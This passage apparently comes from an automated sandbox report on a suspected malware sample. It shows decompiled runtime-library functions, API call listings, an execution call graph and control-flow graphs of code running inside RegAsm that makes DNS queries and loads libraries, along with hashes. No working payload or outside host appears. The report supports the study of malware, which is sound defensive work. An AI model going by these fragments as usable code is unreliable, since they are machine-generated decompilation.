					if( *((intOrPtr*)(_t70 - 8)) != 0x273638) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00264676(_t31);
							E00264676( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00264676(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00264676(_t74);
			}















        0x00267010
        0x00267014
        0x0026701c
        0x00267025
        0x0026702a
        0x00267031
        0x00267039
        0x00267041
        0x0026704c
        0x00267052
        0x00267053
        0x0026705b
        0x00267063
        0x0026706e
        0x00267074
        0x00267078
        0x00267083
        0x00267089
        0x0026702a
        0x0026708a
        0x00267092
        0x002670a5
        0x002670b8
        0x002670c6
        0x002670d1
        0x002670d6
        0x002670df
        0x002670e7
        0x002670e8
        0x002670ee
        0x002670f1
        0x002670f4
        0x002670fb
        0x002670fd
        0x00267101
        0x00267109
        0x00267110
        0x00267116
        0x00267117
        0x00267117
        0x0026711e
        0x00267120
        0x00267125
        0x0026712d
        0x00267132
        0x00267133
        0x00267133
        0x00267136
        0x00267139
        0x0026713c
        0x0026713f
        0x0026713f
        0x00267151

        APIs
          • Part of subcall function 00264676: HeapFree.KERNEL32(00000000,00000000,?,00266D5C,?,00000000,?,00000000,?,00266D83,?,00000007,?,?,002671A0,?), ref: 0026468C
          • Part of subcall function 00264676: GetLastError.KERNEL32(?,?,00266D5C,?,00000000,?,00000000,?,00266D83,?,00000007,?,?,002671A0,?,?), ref: 0026469E
        • ___free_lconv_mon.LIBCMT ref: 0026704C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ErrorFreeHeapLast___free_lconv_mon
        • String ID: 86'$H6'
        • API String ID: 4068849827-3673023456
        • Opcode ID: 573fa373422200d2e1b05edf697862e32f2f17e8cc7402b457796e532929bc92
        • Instruction ID: 95771267e7f82dff7fdccc1dd0f54122ab7ffda271c8586fb0243569bd653d88
        • Opcode Fuzzy Hash: 573fa373422200d2e1b05edf697862e32f2f17e8cc7402b457796e532929bc92
        • Instruction Fuzzy Hash: BC318131524306AFEB30AE38E845F56B3E9EF01364F10945AF498D7291DF31ADE08B64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 002629BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 37%
        			E002629BB(void* __ecx, struct _EXCEPTION_POINTERS* _a4) {

				asm("repne jnz 0x5");
				asm("repne ret");
				asm("repne jmp 0x2e");
				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



        0x002629c1
        0x002629c4
        0x002629c6
        0x002629d1
        0x002629da
        0x002629f3

        APIs
        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002629FF
        • ___raise_securityfailure.LIBCMT ref: 00262AE6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: FeaturePresentProcessor___raise_securityfailure
        • String ID: 7'
        • API String ID: 3761405300-3510403523
        • Opcode ID: 1d5acf04c4619cb5f5ade7bff8e575651fda13b3d32257f44a8a6f8cbd6082e7
        • Instruction ID: cbc95e0f854bd962945d6313ee6b166a1953d7142782bf61e70552959614c19d
        • Opcode Fuzzy Hash: 1d5acf04c4619cb5f5ade7bff8e575651fda13b3d32257f44a8a6f8cbd6082e7
        • Instruction Fuzzy Hash: 6621EFF4661202EAD314DF15F94AA54BBE4FB48310F14506AF95C8B3A0E3B19AC5EF46
        Uniqueness

        Uniqueness Score: -1.00%

        Execution Graph

        Execution Coverage:14%
        Dynamic/Decrypted Code Coverage:100%
        Signature Coverage:0%
        Total number of Nodes:283
        Total number of Limit Nodes:25
        execution_graph 18690 5286758 18693 5286344 18690->18693 18692 5286766 18694 528634f 18693->18694 18697 5286394 18694->18697 18696 528688d 18696->18692 18698 528639f 18697->18698 18701 52863c4 18698->18701 18700 5286962 18700->18696 18702 52863cf 18701->18702 18705 52863f4 18702->18705 18704 5286a62 18704->18700 18706 52863ff 18705->18706 18708 528717e 18706->18708 18712 52892b9 18706->18712 18707 52871bc 18707->18704 18708->18707 18718 528b408 18708->18718 18723 528b3f9 18708->18723 18713 52892ac 18712->18713 18714 52892c6 18712->18714 18713->18708 18728 52892e0 18714->18728 18732 52892f0 18714->18732 18715 52892ce 18715->18708 18720 528b429 18718->18720 18719 528b44d 18719->18707 18720->18719 18755 528b5b8 18720->18755 18759 528b5aa 18720->18759 18724 528b408 18723->18724 18725 528b44d 18724->18725 18726 528b5b8 6 API calls 18724->18726 18727 528b5aa 6 API calls 18724->18727 18725->18707 18726->18725 18727->18725 18729 52892f0 18728->18729 18735 52893e8 18729->18735 18730 52892ff 18730->18715 18734 52893e8 2 API calls 18732->18734 18733 52892ff 18733->18715 18734->18733 18736 52893fb 18735->18736 18737 5289413 18736->18737 18743 5289660 18736->18743 18747 5289670 18736->18747 18737->18730 18738 528940b 18738->18737 18739 5289610 GetModuleHandleW 18738->18739 18740 528963d 18739->18740 18740->18730 18744 5289670 18743->18744 18746 52896a9 18744->18746 18751 5288768 18744->18751 18746->18738 18748 5289684 18747->18748 18749 5288768 LoadLibraryExW 18748->18749 18750 52896a9 18748->18750 18749->18750 18750->18738 18752 5289850 LoadLibraryExW 18751->18752 18754 52898c9 18752->18754 18754->18746 18756 528b5c5 18755->18756 18757 528b5ff 18756->18757 18763 528a0ec 18756->18763 18757->18719 18760 528b5b2 18759->18760 18761 528b5ff 18760->18761 18762 528a0ec 6 API calls 18760->18762 18761->18719 18762->18761 18764 528a0f7 18763->18764 18766 528c2f8 18764->18766 18767 528b904 18764->18767 18766->18766 18768 528b90f 18767->18768 18769 52863f4 6 API calls 18768->18769 18770 528c367 18769->18770 18779 528c3e0 18770->18779 18783 528c3d1 18770->18783 18771 528c375 18772 528b914 LoadLibraryExW GetModuleHandleW 18771->18772 18773 528c38f 18772->18773 18775 528e0d8 LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 18773->18775 18776 528e0f0 LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 18773->18776 18774 528c3a0 18774->18766 18775->18774 18776->18774 18780 528c40e 18779->18780 18781 528c4da KiUserCallbackDispatcher 18780->18781 18782 528c4df 18780->18782 18781->18782 18784 528c40e 18783->18784 18785 528c4da KiUserCallbackDispatcher 18784->18785 18786 528c4df 18784->18786 18785->18786 18787 528fe10 18790 528da3c 18787->18790 18791 528fe40 SetWindowLongW 18790->18791 18792 528fe28 18791->18792 18793 528b6d0 18794 528b736 18793->18794 18798 528bc88 18794->18798 18802 528bc98 18794->18802 18795 528b7e5 18799 528bc96 18798->18799 18806 528a14c 18799->18806 18803 528bcbb 18802->18803 18804 528a14c DuplicateHandle 18803->18804 18805 528bcc6 18804->18805 18805->18795 18807 528bd00 DuplicateHandle 18806->18807 18808 528bcc6 18807->18808 18808->18795 18636 64c23c0 18637 64c23c9 18636->18637 18641 64c2401 18637->18641 18646 64c2410 18637->18646 18638 64c23fa 18642 64c2410 18641->18642 18651 64c2448 18642->18651 18656 64c2439 18642->18656 18643 64c242c 18643->18638 18647 64c2415 18646->18647 18649 64c2448 3 API calls 18647->18649 18650 64c2439 3 API calls 18647->18650 18648 64c242c 18648->18638 18649->18648 18650->18648 18652 64c2466 18651->18652 18653 64c248e 18652->18653 18661 64c2540 18652->18661 18667 64c2550 18652->18667 18653->18643 18657 64c2448 18656->18657 18658 64c248e 18657->18658 18659 64c2540 3 API calls 18657->18659 18660 64c2550 3 API calls 18657->18660 18658->18643 18659->18657 18660->18657 18662 64c2550 18661->18662 18673 64c27bc 18662->18673 18678 64c2701 18662->18678 18684 64c2710 18662->18684 18663 64c25ba 18663->18652 18668 64c2579 18667->18668 18670 64c27bc DnsQuery_A 18668->18670 18671 64c2710 DnsQuery_A 18668->18671 18672 64c2701 DnsQuery_A 18668->18672 18669 64c25ba 18669->18652 18670->18669 18671->18669 18672->18669 18674 64c277c 18673->18674 18675 64c2780 18674->18675 18676 64c28af DnsQuery_A 18674->18676 18675->18663 18677 64c2902 18676->18677 18679 64c272e 18678->18679 18681 64c2742 18678->18681 18679->18663 18680 64c2780 18680->18663 18681->18680 18682 64c28af DnsQuery_A 18681->18682 18683 64c2902 18682->18683 18685 64c272e 18684->18685 18687 64c2742 18684->18687 18685->18663 18686 64c2780 18686->18663 18687->18686 18688 64c28af DnsQuery_A 18687->18688 18689 64c2902 18688->18689 18809 64c5350 18810 64c536a 18809->18810 18813 64c3fe8 18810->18813 18814 64c4012 18813->18814 18816 64c401a 18813->18816 18815 64c4049 18816->18815 18820 64c424f 18816->18820 18824 64c40e7 18816->18824 18828 64c40f8 18816->18828 18822 64c4189 18820->18822 18821 64c4247 18821->18815 18822->18821 18832 64c2fd0 18822->18832 18827 64c4122 18824->18827 18825 64c4247 18825->18815 18826 64c2fd0 2 API calls 18826->18825 18827->18825 18827->18826 18829 64c4122 18828->18829 18830 64c4247 18829->18830 18831 64c2fd0 2 API calls 18829->18831 18830->18815 18831->18830 18833 64c2ffe 18832->18833 18836 64c303d 18832->18836 18834 64c3017 18833->18834 18835 64c31ee 18833->18835 18833->18836 18834->18836 18841 64c32c0 18834->18841 18849 64c32b0 18834->18849 18857 64c42d0 18835->18857 18862 64c42e0 18835->18862 18836->18821 18843 64c32e8 18841->18843 18842 64c3362 18842->18836 18843->18842 18844 64c3358 18843->18844 18867 64c339f 18843->18867 18878 64c33b0 18843->18878 18888 64c4260 18844->18888 18892 64c4270 18844->18892 18850 64c32c0 18849->18850 18851 64c3358 18850->18851 18852 64c3362 18850->18852 18853 64c339f 2 API calls 18850->18853 18854 64c33b0 2 API calls 18850->18854 18855 64c4260 2 API calls 18851->18855 18856 64c4270 2 API calls 18851->18856 18852->18836 18853->18851 18854->18851 18855->18852 18856->18852 18858 64c42e0 18857->18858 18859 64c42f6 18858->18859 18860 64c339f 2 API calls 18858->18860 18861 64c33b0 2 API calls 18858->18861 18859->18836 18860->18859 18861->18859 18863 64c42f2 18862->18863 18864 64c42f6 18863->18864 18865 64c339f 2 API calls 18863->18865 18866 64c33b0 2 API calls 18863->18866 18864->18836 18865->18864 18866->18864 18868 64c33b0 18867->18868 18869 64c34c6 18868->18869 18871 64c33d4 18868->18871 18906 64c4400 18869->18906 18914 64c4587 18869->18914 18922 64c43ef 18869->18922 18930 64c4593 18869->18930 18870 64c348c 18870->18844 18896 64c3550 18871->18896 18901 64c3560 18871->18901 18879 64c34c6 18878->18879 18881 64c33d4 18878->18881 18884 64c43ef 2 API calls 18879->18884 18885 64c4587 2 API calls 18879->18885 18886 64c4400 2 API calls 18879->18886 18887 64c4593 2 API calls 18879->18887 18880 64c348c 18880->18844 18882 64c3550 2 API calls 18881->18882 18883 64c3560 2 API calls 18881->18883 18882->18880 18883->18880 18884->18880 18885->18880 18886->18880 18887->18880 18890 64c4278 18888->18890 18889 64c42a0 18889->18842 18890->18889 18891 64c2fd0 2 API calls 18890->18891 18891->18889 18894 64c4278 18892->18894 18893 64c42a0 18893->18842 18894->18893 18895 64c2fd0 2 API calls 18894->18895 18895->18893 18897 64c3560 18896->18897 18899 64c3fe8 2 API calls 18897->18899 18938 64c3fc4 18897->18938 18898 64c3642 18898->18870 18899->18898 18902 64c3594 18901->18902 18904 64c3fe8 2 API calls 18902->18904 18905 64c3fc4 2 API calls 18902->18905 18903 64c3642 18903->18870 18904->18903 18905->18903 18907 64c4423 18906->18907 18909 64c44bc 18907->18909 18944 64c4600 18907->18944 18949 64c46ad 18907->18949 18954 64c4610 18907->18954 18908 64c45bd 18908->18870 18909->18908 18910 64c42e0 2 API calls 18909->18910 18910->18909 18915 64c44ac 18914->18915 18917 64c44bc 18914->18917 18915->18917 18919 64c46ad 2 API calls 18915->18919 18920 64c4600 2 API calls 18915->18920 18921 64c4610 2 API calls 18915->18921 18916 64c42e0 2 API calls 18916->18917 18917->18916 18918 64c45bd 18917->18918 18918->18870 18919->18917 18920->18917 18921->18917 18926 64c4400 18922->18926 18923 64c44bc 18924 64c45bd 18923->18924 18925 64c42e0 2 API calls 18923->18925 18924->18870 18925->18923 18926->18923 18927 64c46ad 2 API calls 18926->18927 18928 64c4600 2 API calls 18926->18928 18929 64c4610 2 API calls 18926->18929 18927->18923 18928->18923 18929->18923 18931 64c44ac 18930->18931 18932 64c44bc 18930->18932 18931->18932 18935 64c46ad 2 API calls 18931->18935 18936 64c4600 2 API calls 18931->18936 18937 64c4610 2 API calls 18931->18937 18933 64c45bd 18932->18933 18934 64c42e0 2 API calls 18932->18934 18933->18870 18934->18932 18935->18932 18936->18932 18937->18932 18940 64c3fe8 18938->18940 18939 64c4012 18939->18898 18940->18939 18941 64c424f 2 API calls 18940->18941 18942 64c40f8 2 API calls 18940->18942 18943 64c40e7 2 API calls 18940->18943 18941->18939 18942->18939 18943->18939 18946 64c4610 18944->18946 18945 64c46f2 18945->18909 18946->18945 18959 64c4730 18946->18959 18965 64c4721 18946->18965 18950 64c468a 18949->18950 18951 64c46f2 18950->18951 18952 64c4730 2 API calls 18950->18952 18953 64c4721 2 API calls 18950->18953 18951->18909 18952->18950 18953->18950 18955 64c46f2 18954->18955 18956 64c463a 18954->18956 18955->18909 18956->18955 18957 64c4730 2 API calls 18956->18957 18958 64c4721 2 API calls 18956->18958 18957->18956 18958->18956 18961 64c4735 18959->18961 18960 64c473b 18960->18946 18961->18960 18971 64c4770 18961->18971 18975 64c4761 18961->18975 18962 64c4754 18962->18946 18967 64c4730 18965->18967 18966 64c473b 18966->18946 18967->18966 18969 64c4770 2 API calls 18967->18969 18970 64c4761 2 API calls 18967->18970 18968 64c4754 18968->18946 18969->18968 18970->18968 18972 64c477b 18971->18972 18973 64c4789 18971->18973 18972->18962 18973->18972 18979 64c0260 18973->18979 18977 64c4770 18975->18977 18976 64c477b 18976->18962 18977->18976 18978 64c0260 2 API calls 18977->18978 18978->18976 18980 64c0270 18979->18980 18981 64c02dd 18980->18981 18982 64c07b0 CreateWindowExW CreateWindowExW 18980->18982 18981->18972 18982->18981

        Executed Functions

        Function 064C2710 Relevance: 1.7, APIs: 1, Instructions: 207COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 26 64c2710-64c272c 27 64c272e-64c273f 26->27 28 64c2742-64c27a3 26->28 37 64c277c-64c277e 28->37 38 64c2780-64c27af 37->38 39 64c27b1-64c27c4 37->39 39->37 42 64c27c6-64c283b 39->42 46 64c283d-64c2847 42->46 47 64c2874-64c2900 DnsQuery_A 42->47 46->47 49 64c2849-64c284b 46->49 57 64c2909-64c2956 47->57 58 64c2902-64c2908 47->58 50 64c284d-64c2857 49->50 51 64c286e-64c2871 49->51 53 64c2859 50->53 54 64c285b-64c286a 50->54 51->47 53->54 54->54 55 64c286c 54->55 55->51 63 64c2958-64c295c 57->63 64 64c2966-64c296a 57->64 58->57 63->64 65 64c295e 63->65 66 64c296c-64c296f 64->66 67 64c2979-64c297d 64->67 65->64 66->67 68 64c298e 67->68 69 64c297f-64c298b 67->69 71 64c298f 68->71 69->68 71->71
        Memory Dump Source
        • Source File: 00000003.00000002.513968175.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_64c0000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 36d2bac85079fd26bbdb6eebd69a17f0567ac80cb825f194865fe0e922054fe1
        • Instruction ID: 3a6990b83a87128883d35db871b93bd46521825587bf7c825846d80ad13b4c06
        • Opcode Fuzzy Hash: 36d2bac85079fd26bbdb6eebd69a17f0567ac80cb825f194865fe0e922054fe1
        • Instruction Fuzzy Hash: 11814775D00209CFDB50DFA9D880ADEBBB1FF49324F24852ED815AB350DBB49A46CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Function 052893E8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 72 52893e8-52893fd call 5288704 75 52893ff 72->75 76 5289413-5289417 72->76 128 5289405 call 5289660 75->128 129 5289405 call 5289670 75->129 77 5289419-5289423 76->77 78 528942b-528946c 76->78 77->78 83 5289479-5289487 78->83 84 528946e-5289476 78->84 79 528940b-528940d 79->76 80 5289548-5289608 79->80 121 528960a-528960d 80->121 122 5289610-528963b GetModuleHandleW 80->122 85 5289489-528948e 83->85 86 52894ab-52894ad 83->86 84->83 88 5289499 85->88 89 5289490-5289497 call 5288710 85->89 90 52894b0-52894b7 86->90 93 528949b-52894a9 88->93 89->93 94 52894b9-52894c1 90->94 95 52894c4-52894cb 90->95 93->90 94->95 97 52894d8-52894e1 call 5288720 95->97 98 52894cd-52894d5 95->98 102 52894ee-52894f3 97->102 103 52894e3-52894eb 97->103 98->97 105 5289511-5289515 102->105 106 52894f5-52894fc 102->106 103->102 126 5289518 call 5289968 105->126 127 5289518 call 5289958 105->127 106->105 107 52894fe-528950e call 5288730 call 5288740 106->107 107->105 110 528951b-528951e 113 5289520-528953e 110->113 114 5289541-5289547 110->114 113->114 121->122 123 528963d-5289643 122->123 124 5289644-5289658 122->124 123->124 126->110 127->110 128->79 129->79
        APIs
        • GetModuleHandleW.KERNEL32(00000000), ref: 0528962E
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: HandleModule
        • String ID:
        • API String ID: 4139908857-0
        • Opcode ID: 26ca5a99a1b696bacf892ec10484ffeaa4af3bb1c3cc516656d8a767fe401c8a
        • Instruction ID: 679185e6800bc8a720fd8d6bae56474a68351090ac296afdcb76447da8767358
        • Opcode Fuzzy Hash: 26ca5a99a1b696bacf892ec10484ffeaa4af3bb1c3cc516656d8a767fe401c8a
        • Instruction Fuzzy Hash: F6711470A11B058FD724EF6AD445B6ABBF1BF88204F00892DD58AD7B90D774E849CF91
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0528FB61 Relevance: 1.7, APIs: 1, Instructions: 160COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 130 528fb61-528fb88 131 528fb8a-528fbac 130->131 132 528fbec-528fc5e 130->132 133 528fbae-528fbd8 call 528da04 131->133 134 528fbe6-528fbea 131->134 135 528fc69-528fc70 132->135 136 528fc60-528fc66 132->136 140 528fbdd-528fbde 133->140 134->132 138 528fc7b-528fd1a CreateWindowExW 135->138 139 528fc72-528fc78 135->139 136->135 142 528fd1c-528fd22 138->142 143 528fd23-528fd5b 138->143 139->138 142->143 147 528fd68 143->147 148 528fd5d-528fd60 143->148 149 528fd69 147->149 148->147 149->149
        APIs
        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0528FD0A
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: CreateWindow
        • String ID:
        • API String ID: 716092398-0
        • Opcode ID: 51d178dc7a0d44b67cbed7918c1b2e9b893b805ef4a13db186e44e81c4fb3fa2
        • Instruction ID: b8e33509e291c295633d399b1bb592244c105efb94396bd1a4cf819e40be368e
        • Opcode Fuzzy Hash: 51d178dc7a0d44b67cbed7918c1b2e9b893b805ef4a13db186e44e81c4fb3fa2
        • Instruction Fuzzy Hash: 016123B1C14289AFCF02CFA9D984ADDBFB1FF49304F29815AE858AB261D7349945CF50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 064C27BC Relevance: 1.6, APIs: 1, Instructions: 140networkCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 150 64c27bc-64c27c4 151 64c277c-64c277e 150->151 152 64c27c6-64c283b 150->152 153 64c2780-64c27af 151->153 154 64c27b1-64c27c4 151->154 157 64c283d-64c2847 152->157 158 64c2874-64c2900 DnsQuery_A 152->158 154->151 154->152 157->158 160 64c2849-64c284b 157->160 171 64c2909-64c2956 158->171 172 64c2902-64c2908 158->172 162 64c284d-64c2857 160->162 163 64c286e-64c2871 160->163 166 64c2859 162->166 167 64c285b-64c286a 162->167 163->158 166->167 167->167 169 64c286c 167->169 169->163 177 64c2958-64c295c 171->177 178 64c2966-64c296a 171->178 172->171 177->178 179 64c295e 177->179 180 64c296c-64c296f 178->180 181 64c2979-64c297d 178->181 179->178 180->181 182 64c298e 181->182 183 64c297f-64c298b 181->183 185 64c298f 182->185 183->182 185->185
        APIs
        • DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 064C28F0
        Memory Dump Source
        • Source File: 00000003.00000002.513968175.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_64c0000_RegAsm.jbxd
        Similarity
        • API ID: Query_
        • String ID:
        • API String ID: 428220571-0
        • Opcode ID: 2dfecb64ff034d644c14c69990b6f5e42e2428027406dcb08868f8ce85dc95c8
        • Instruction ID: 49f88f14014a867960b988af847a4afce04408f2572675cb41b5f105e27e33ee
        • Opcode Fuzzy Hash: 2dfecb64ff034d644c14c69990b6f5e42e2428027406dcb08868f8ce85dc95c8
        • Instruction Fuzzy Hash: 2B511375D002598FDB50CFA9D880ADEBBB1BF48714F24812EE814AB350DBB49A46CF90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0528DA04 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 186 528da04-528fc5e 188 528fc69-528fc70 186->188 189 528fc60-528fc66 186->189 190 528fc7b-528fd1a CreateWindowExW 188->190 191 528fc72-528fc78 188->191 189->188 193 528fd1c-528fd22 190->193 194 528fd23-528fd5b 190->194 191->190 193->194 198 528fd68 194->198 199 528fd5d-528fd60 194->199 200 528fd69 198->200 199->198 200->200
        APIs
        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0528FD0A
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: CreateWindow
        • String ID:
        • API String ID: 716092398-0
        • Opcode ID: aa77246ce5ea0f3eae35c8e6a5f2e69f5fc739f2f3bb96bdbe3fd2c7b15f9406
        • Instruction ID: f033ebde3298e0cb705e22933d8ee88c673f6c8136c181456b18400fd3c231b8
        • Opcode Fuzzy Hash: aa77246ce5ea0f3eae35c8e6a5f2e69f5fc739f2f3bb96bdbe3fd2c7b15f9406
        • Instruction Fuzzy Hash: 2351BEB1D10309EFDB14CF99C984AEEBBB5BF48314F24812AE919AB250D7749985CF90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0528A14C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 201 528a14c-528bd94 DuplicateHandle 203 528bd9d-528bdba 201->203 204 528bd96-528bd9c 201->204 204->203
        APIs
        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0528BCC6,?,?,?,?,?), ref: 0528BD87
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: DuplicateHandle
        • String ID:
        • API String ID: 3793708945-0
        • Opcode ID: 8de46ace49c77b8e7526bd75f5a8eafbf8009468d7609ad9acfb362cef249d3e
        • Instruction ID: fad9c2dadc97201589dc4255f08b3275b16e1488c5b5e1d32f46d57f86967bc4
        • Opcode Fuzzy Hash: 8de46ace49c77b8e7526bd75f5a8eafbf8009468d7609ad9acfb362cef249d3e
        • Instruction Fuzzy Hash: 2121E3B5904249AFDB10CF99D884AEEBBF4FF48314F14841AE958A3350D378A944CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0528BCF9 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 207 528bcf9 208 528bd00-528bd94 DuplicateHandle 207->208 209 528bd9d-528bdba 208->209 210 528bd96-528bd9c 208->210 210->209
        APIs
        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0528BCC6,?,?,?,?,?), ref: 0528BD87
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: DuplicateHandle
        • String ID:
        • API String ID: 3793708945-0
        • Opcode ID: 3874517441988043b1902305824c59456bd8e65c40230f43b747dea86abee866
        • Instruction ID: e988a6e2fa1036fce4ff44135b3b44c35032a40c83b8b0918ea94d8e599ce08f
        • Opcode Fuzzy Hash: 3874517441988043b1902305824c59456bd8e65c40230f43b747dea86abee866
        • Instruction Fuzzy Hash: 3421E5B5900249AFDB10CF99D884AEEBFF4EB49314F14841AE954A3250D378A944CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 05288768 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 213 5288768-5289890 215 5289898-52898c7 LoadLibraryExW 213->215 216 5289892-5289895 213->216 217 52898c9-52898cf 215->217 218 52898d0-52898ed 215->218 216->215 217->218
        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,052896A9,00000800,00000000,00000000), ref: 052898BA
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: 6914461865381251d79c41f1f89a6ea53ed22ebe90a9d4561228f45447392709
        • Instruction ID: 6d2b7347acbbd5fb693f5d7ed6ba2a1c3e0b9a9157509b97c847d59bd47236d7
        • Opcode Fuzzy Hash: 6914461865381251d79c41f1f89a6ea53ed22ebe90a9d4561228f45447392709
        • Instruction Fuzzy Hash: CA1106B59042499FCB10DF9AC844BEEFBF4EF48314F14842AD519B7640C374A545CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 05289849 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 221 5289849-5289890 222 5289898-52898c7 LoadLibraryExW 221->222 223 5289892-5289895 221->223 224 52898c9-52898cf 222->224 225 52898d0-52898ed 222->225 223->222 224->225
        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,052896A9,00000800,00000000,00000000), ref: 052898BA
        Memory Dump Source
        • Source File: 00000003.00000002.512983718.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_5280000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: 7c094254a81cc1602147c503eac6eeaeff691de6d3613cd0844543672d88cd64
        • Instruction ID: 1b2143060366e6f7ee358a740b16bf1c2ce4aef259e5df3ff6da8fdf8266352b
        • Opcode Fuzzy Hash: 7c094254a81cc1602147c503eac6eeaeff691de6d3613cd0844543672d88cd64
